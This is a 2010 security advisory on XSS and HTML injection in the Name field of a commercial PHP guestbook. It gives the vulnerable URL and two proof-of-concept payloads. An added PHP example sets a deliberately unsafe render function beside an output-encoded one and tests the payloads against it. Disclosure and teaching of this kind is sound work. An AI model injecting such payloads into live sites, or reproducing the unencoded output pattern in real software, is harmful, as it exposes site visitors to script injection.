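GuestBook Script: Multiple Vulnerabilities
Posted by: wpulog | Published: August 16, 2010
GuestBook Script is a PHP-based guestbook system. Its demo version contains XSS and HTML injection vulnerabilities, and these may also be present in the paid version.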
[+]info:
~~~~~~~~~
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php
# Author: AnTi SeCuRe
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: AnTi-SeCuRe@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
[+]poc:
~~~~~~~~~
[~]Note : Its not free ,, Its By 17,99
[~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php
[~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<p align="center"><b>Sa-ViRuS.CoM</b></p>
[~] Xss Vuln. : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14648
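
[+]Added example (not part of the advisory, not the vendor's code): both issues above come from the Name field being written into the page without output encoding. The PHP below shows that pattern beside a hardened one and runs the two Name values quoted above through the hardened path. The guestbook's source is not shown in the advisory, so all function names and markup here are assumptions.

```php
<?php
// Added example; function names and markup are assumptions, since the
// advisory does not show the guestbook's source.

// Vulnerable pattern: the submitted name is placed into the page as-is,
// so any markup in it becomes part of the document.
function render_entry_unsafe(string $name, string $comment): string
{
    return "<div class=\"entry\"><b>$name</b>: $comment</div>";
}

// Encode for HTML text and quoted-attribute contexts. ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input validation: bound the length and reject control characters. Markup
// characters are accepted because output encoding neutralises them.
function normalize_name(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 64 || preg_match('/[\x00-\x1F\x7F]/', $name)) {
        return null;
    }
    return $name;
}

// Hardened pattern: every user-supplied value is encoded at output time.
function render_entry_safe(string $name, string $comment): string
{
    return '<div class="entry"><b>' . h($name) . '</b>: ' . nl2br(h($comment)) . '</div>';
}

// The two Name values quoted in the advisory, used as test input.
$samples = [
    '<p align="center"><b>Sa-ViRuS.CoM</b></p>',
    "<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>",
];
foreach ($samples as $name) {
    $html = render_entry_safe(normalize_name($name) ?? 'anonymous', 'hello');
    // No tag from the name may survive encoding.
    if (stripos($html, '<script') !== false || strpos($html, '<p ') !== false) {
        throw new RuntimeException('name was not encoded');
    }
    echo $html, PHP_EOL;
}
```

Entries already stored before such a fix still hold raw markup, which is why the encoding is applied when rendering and not only when saving.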